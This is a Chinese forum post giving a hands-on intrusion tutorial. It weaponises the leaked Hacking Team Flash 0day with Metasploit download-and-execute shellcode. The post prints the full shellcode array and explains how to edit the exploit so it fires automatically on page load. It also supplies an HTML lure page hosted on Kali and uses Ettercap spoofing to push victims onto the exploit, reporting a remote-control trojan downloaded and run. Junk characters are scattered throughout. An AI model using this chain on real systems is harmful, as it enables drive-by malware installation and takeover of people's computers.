|
! ?# I+ G3 p; X% [7 C
三、flash 0day之手工代码修改制作下载者实例入侵演示 & Q0 R4 ]+ r2 e# O# e, r v
& s i, ^6 ]) s5 C
3 R! E) X6 f! \3 a5 [ L5 H
利用到的工具: 8 l8 V# {" U5 y& c4 q' r0 s
$ q8 H6 l; q# r1 Q* x( U
& Q) E# I6 X! Z9 \( n9 C' @ Msf & d0 n1 r: G' w( B* q
7 S- U8 y/ C0 k8 M1 E
. M2 y/ p4 p+ t* D Ettercap , ]( H) n$ h- p4 e2 |) R0 ]( }
) X1 n# C1 j7 u3 j' ^' s
) z& x% B' h& b( H8 b8 T) h# j Adobe Flash CS6
5 i R4 Q5 D: L) N- K: M0 I0 Z( z : S8 V1 Q+ Q' g/ D4 v
$ z: t) j+ x* x" N" T) w" Y
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
: t( Q4 L4 s4 ^5 [ # i7 ^6 l7 ~( E
. F5 x0 z) b) b' y6 N' M 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
3 A, {2 A! o* q ! A: Z$ k8 v% R# w0 q* i0 U4 j- l, v' S
0 c$ Y$ H: D% }
如图:
! l. D- _ L: `0 W. }+ Y
6 l* C5 w* F* v9 W: `, E+ A1 T2 P8 V8 h% C; e
1 @" m) B/ z2 G% F& F
7 V1 {6 |% E$ Y4 M
) t' W5 ?! F( j. z3 a$ I+ ]
 0 Q3 z/ ~$ t3 L$ x0 p9 @( h X( c* }) r
* f6 A# B, m% V8 Z* `' ? }7 ^# N" B# C( }; s, @, X
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: . D0 F: N- v! `" e
) d) {7 a) ]8 g: o
# e" A5 i3 V$ y c: Z0 F( Y
( c# N2 L* y7 G) i9 r& _) g; H
9 p7 ~. N8 @ T2 a& m4 t7 w4 f$ G7 z4 K
 3 z/ \) h) q/ S7 X5 o% y5 j
0 c! n$ \7 E* W# d
! s. U* G5 J& y9 _% w
然后执行generate -t dword生成shellcode,如下:
* \( X' i* @7 |9 N 8 f$ d$ t# W O, h
- {! R8 p+ [. c7 _) ]2 v
 9 O! h% c9 B9 p& }: X# t5 ?# n* N
) |- P4 A1 k& e' F
1 R# L: W" b9 n5 o% I% B 复制代码到文本下便于我们一会编辑flash exp,如下:
3 s, @( ]% d! k8 |9 j! F5 c & b: D- J4 P+ l: p/ m- H
. o6 B# O. B& C Q8 Z
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, $ h; N" S) O6 F( X' ~5 u
8 e3 d$ V7 W2 E+ i0 Q' b4 |8 {& d* L# J+ T0 _; C" O
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, " d: G# y: X: w/ p: Z5 X
1 U. i7 v& Q t K/ p' X2 H
' K `- q9 R+ |8 v% J5 V 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 7 T4 G0 X! q. ^! ^9 S, }
2 M# M% ^& V6 \2 \7 |9 y9 F
/ b7 N6 U: L. J% Z. A4 r. o 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, : w' o3 g4 K& o0 ]( u) S2 @2 ?/ V
. O, y; I U" x$ C3 j2 J0 `* g
1 ~- _3 e' K5 Z9 J 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 7 V, Z* G4 Q. O
, X: N4 ~6 i8 a6 k
. V. _% i: V+ M/ }1 \8 O( a
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
( x9 @6 d- m! C. B% S" s: q 2 V8 T1 f8 x9 ~- j2 L; W
9 S2 b$ u! |9 w 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, + k4 A; ~. o. E4 M
* ?! P% B3 n& {9 `
: `2 w+ R: w" r8 c4 i! X5 `9 p 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
& p5 V# }7 y/ C, V; {8 n
1 i- Y1 j& V6 }% ]7 \" J0 P) H' d
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 1 u- Z" M0 X6 a1 i# o
* d9 N. f& e: |: O$ c A
; e7 x3 l) h; B/ d' J 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 8 P( g9 Y+ _2 Z# s& f
H' V$ C3 W$ e" i& l3 a Y
( I5 l$ {! O. U4 K; o* N, M 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ( g+ ], p% F6 H& B3 U0 P0 ?
2 u6 Z: n1 o, C0 q9 G6 o
6 T5 H3 }, n8 j K2 p$ v& u 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, - U" p7 `: p+ e: R/ |
5 ]6 n" O, I3 g
& B; l2 u2 O4 @ z3 M3 W 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, - B( Z& K1 J" z! n# _
7 }9 _2 H, h1 _( p, O, ~
/ O2 L, v& F! p. \ 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 : g- \* l U# R( S0 k, M; H
X1 h0 p& t) } M' r' {5 {% e
|" c- \, j( n) ~- B9 { * D( D( t7 ^ [$ \+ ^0 ^
! ]$ ~8 k: y5 X( |% v
: x1 k! c$ F# P
- {' ~: J0 [! n) y
l- g) Y6 { l# s4 P/ `" m' |1 W% o' t
下面我们来修改flash 0day exp,需要修改三个文件,分别为: 3 r: K! ]3 R9 a; a( i, i
c! r& F Z" T7 g# U
8 Y# l+ [) X- L- C c3 S$ U$ d( v  s, m# g3 R% h. M& i: [
4 G, {, z' @; B. a; s0 c. T8 t( ~ l+ v7 Y% \
先修改ShellWin32.as,部分源代码如图:
" K. w: |# n% `3 k! z v# s / J( @9 A Y* ], x0 B: a% K
& b0 q P! L2 \6 O 
; T9 R, M/ ?, m) F ) I. |" t. r8 h( ~) K
2 M$ o. n6 `2 |) x1 d" _ |# V 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: . a3 a1 Y* S: M ~0 L
1 R. d/ c. J( Y, i+ T( n
7 K* S t0 }. l" O2 W( N! w: [0 n2 d
m* a) U/ f" `# e % p. m$ j$ I- K. J, Y( r
: E# N. o/ t3 F6 D6 C 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
- }5 i9 t3 i& c+ _) E' m" H/ [ : G+ i! k* _( h% o0 k; \
3 k+ q D' o# ~5 |% }( ^  / C) K. u/ h5 k, E* t2 w
- t9 n6 J/ _0 p$ c1 V. Y& b
: |, g3 W9 G6 l+ O6 f 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: % Y* \- s" w& \5 p$ `4 i! w! G
! Z r- ^) J1 Y; ]4 j. y
- [/ U2 D* p5 z% y2 V5 }0 H 8 p; D6 x) N" k. a! H
' k. y1 G, r! c7 b7 u5 i7 O2 v$ \3 U3 T E5 \* U
0 G+ ^* O8 y$ w$ e6 P- \
% n o5 K$ v; k+ o8 R
+ w4 j3 n) ]" L ~3 J
; o% A. Y- A% B5 `) k 9 R0 t# x- S- Y/ A* P
. p' ^4 P9 w% G8 w3 v( l$ H4 T
然后点保存,下面我们来编译一下,打开
! z% W7 i3 w" n$ N
6 Z7 u% n$ Q$ o" k/ D* R
8 j4 z$ v3 R5 Y, _ exp1.fla然后点文件-发布,看看编译没错误 7 f6 B6 q, U4 z8 ^7 l8 q2 l
# P+ n7 a2 a- C2 W* i6 G
% s. a5 \2 |+ T1 G# w
* D( T8 u1 S- |4 k6 R, Y $ c k: p5 T6 |! s" ?+ d
: k" w1 ~" T+ J5 S& P% }! u$ @ ) k1 i/ w$ K; X: [! {# S
! C+ C% [# [$ J O3 N" x- l
' v5 y* {" G4 e# G/ F T
% Z5 Q/ d" ~3 i4 d3 V
7 K# I) t" l; e; D4 f8 v4 w0 u3 H4 L& O% e k- j. k+ I
 5 a! L' a/ }7 `
" B8 @& |5 p! M( h9 x2 p% w; o) t3 g
然后我们把生成的
1 e" T7 f: L& b + p* u* w y4 Q" u- O6 R* s1 d
7 h/ e9 h$ T* ]. C; Y exp1.swf丢到kailinux 的/var/www/html下:
: \$ m" ]6 d) @. D9 N# H; a2 N: Q# E ! d8 m7 e, q) _; x
5 B- }5 G( \" @/ V. d 然后把这段代码好好编辑一下
% A5 ~6 p: i! x/ b) `
* {. B( g3 Y& Y/ R2 a. w( v! f0 C/ u. X2 m4 J {- V' x' B
3 j/ S4 O6 i$ v7 U/ T1 D U8 P
s& z8 h0 i' ]3 E: k6 g' P
1 k2 ]. O4 `- m- Y, M$ S4 o . X9 b: y4 E2 C) a0 u8 C
( h, a% ?# M: M8 V
0 e# g$ K# z1 u8 Z
. m: a, H, s7 C; r i# h! g( a
6 X( {% O% x3 ^+ J6 ?
3 A) ]1 k- G+ ~ i
- Z/ O, @6 a R5 C1 v4 Z & p$ ~9 |/ N2 v5 _3 }
: z% W0 z" c2 E& t y" z
4 O0 ?( ~* c. t' U
; Z% h0 {- r6 [) T( E3 E* F) Q: A# J2 h1 e
: z- e5 V. Z; l, T+ f4 O9 _
$ d8 \, q9 [0 ~9 O" A% m8 v
* X8 m$ }' V+ W0 H <!DOCTYPE html>
0 ]" {6 J& ]5 o2 f! W: ~. F7 }( B + p3 v! C7 L7 O; i; M4 n) d
6 C# @% d& Z! n( b, O n& X: a
<html> : Z: q" K O/ v+ x- C
n- e. C9 v; ~( E
2 l9 E! I/ |6 W, V, c; j
<head> 1 N5 X& @. Y3 `1 z* M1 h; V
4 ~# m! e y: {* h; i( d2 b2 k9 Y- V/ n+ b5 }
<meta http-equiv="Content-Type" content="text/html; # Z! J$ p/ ~- q6 g T2 D
- O% ?' d( I& L9 c4 W, e9 V& p, z* [ q/ \
charset=utf-8"/> & H {, V+ X. c) [) y) {( F' y
% P0 C1 E, W O9 o, R; e
m; v& Q g# c( M' }5 _ </head> 9 e( [/ J Q+ Q) H6 F8 e
3 Y Y6 w/ _1 l4 f% A/ @, g
1 o* k' J- [9 R
<body> 1 Z9 t3 v" B8 G: s# Y7 ^4 i
( p' p8 R- }/ `$ d5 D6 Y3 P: Y3 z
! j! o( W3 M6 ~* G4 @$ p2 J <h2> Please wait, the requested page is loading...</h2>
3 @4 c+ y" z$ i7 g$ o ; D' @% {; {6 {5 Y% l- M N& s# V
4 n- V4 R3 M& k0 ]2 u7 ~' i3 u7 u" p
<br>
" g) K3 \2 l- `4 n ' Q3 ?/ Y; W, k& W; K8 n1 Q
$ C+ x% L7 p0 @+ w0 ?4 ~4 H
<OBJECT
* ^ [! p$ B1 r$ t" ~
! [& U: o) f/ _0 W
8 r& j" {, U1 q8 e5 K0 |1 |. S classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
7 f1 J) t6 x+ p$ @4 a; g
2 `9 K* D" C3 m1 @; ^/ ]* `. E6 ?0 f4 ^9 j: e. U
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
4 a" x# U* Y K" P. y 9 o x! N. g; [2 A- F' e. r; i; S* L
3 x* f: Y, ]6 q; D </body> 8 p% m+ k$ v+ H {& f0 d" r
7 K7 D% Y! t9 |) {
: `- e) ~( I9 e6 Z5 I$ l, G$ C9 u8 \ <script>
# h) P. p( G; x5 e 1 Z- y( ?# X7 c* v' A0 L
# T! f ~' ?7 c
setTimeout(function () {
, ~4 q0 L! x5 I$ P; T" s 0 |: r3 N4 P; X2 I
$ O# n" |, S8 {
* m b: J6 c# d* o6 S8 a6 k+ u
" S/ C1 X, Y7 Y
0 ]5 g5 [/ ]8 d5 I) Z window.location.reload();
- y: U) _, J3 j7 ?+ \
0 m: s# S* ?' D. U* q: o, T, P% ~1 j
}, 10000);
% T8 P+ F2 l3 ~3 O6 Y; @7 t9 L
* f/ [8 j" a' v; t4 k9 u- O$ q/ z$ U. V5 Y! _4 `5 O7 W
0 i) m" g6 q- g8 |/ Z
}" h4 Q5 G8 h/ q
6 [6 J K7 T6 v, w </script>
/ |& ?9 G; [& r9 r % G% A3 H' {3 Q) o; r: W: r
0 P- m& G% k6 M3 U </html>
2 ~2 C4 e: V( P1 H7 z2 p P! u7 a# Q V9 b% v$ V2 d; o2 P
|4 `/ s8 e5 ~7 p
9 T# F+ f3 n, w* Y
$ A" `1 L" [. q
$ z6 l2 _2 Q& _ ?) D) a$ s 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ( c+ b2 c4 w, ?0 r* M
( y( q! g1 y$ r/ c8 |9 t
, k! |: w6 S4 v3 T
 ! _/ E. |. z. k3 o. b
% ^" M. [6 G- u8 L* ^% W! e
: M) ?3 u* r3 @5 _: F
& f& L" [5 j7 a- m& @3 y
. P0 m+ m3 C: P- M7 m) A
7 J4 w5 V6 [/ C ' ]0 s! |) M. M
! y& l0 x; [4 ?% [ t2 b
/ d% V% c$ R5 d9 E' v; d3 p
1 }& L* y6 A$ c
D' p6 s6 a7 z7 q
" v+ F: ^! \( i. R' T3 B
4 T C, s# e9 W- q6 I
$ z% S3 d1 X: I. |- W) H' r! F j4 K, d5 Y6 |% H' z/ K& A* p3 F
下面我们用ettercap欺骗如图:
/ A7 K5 k! l- w8 U
4 Y' j$ V( e. Z4 m
9 ~1 Q6 { n7 h: o  4 H$ o( T0 }+ f. i
1 ^6 ]' S! V0 o y- x/ X! q* _5 e" [
+ V6 q }- C* k# [ % K0 P1 w1 U0 h
2 I' p5 O2 i' M2 u/ l& e 下面我们随便访问个网站看看: + @- c5 ~6 {' g0 I& A2 O
* H, `+ i+ g: v. ~; p6 F
" b7 m* v# h$ j6 J) f! f9 I
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: # L6 y1 x2 j7 _/ x
`6 N) R! e; K% o- r1 D, ^$ {
% N7 o( s( {3 P. h* l1 A
 : B/ {8 Z" z8 m+ Q" o' V% k
Y! M5 L6 w+ P: V+ H% T' {9 A
2 J' R9 Z0 [% `6 C6 l ^ 我们看另一台, 9 w9 l3 R0 K _- Q5 v# v
' `# a( d0 J: p0 x
* }$ V9 C; W3 t, e" b, ] 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 ' v" w2 y5 q+ Q
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对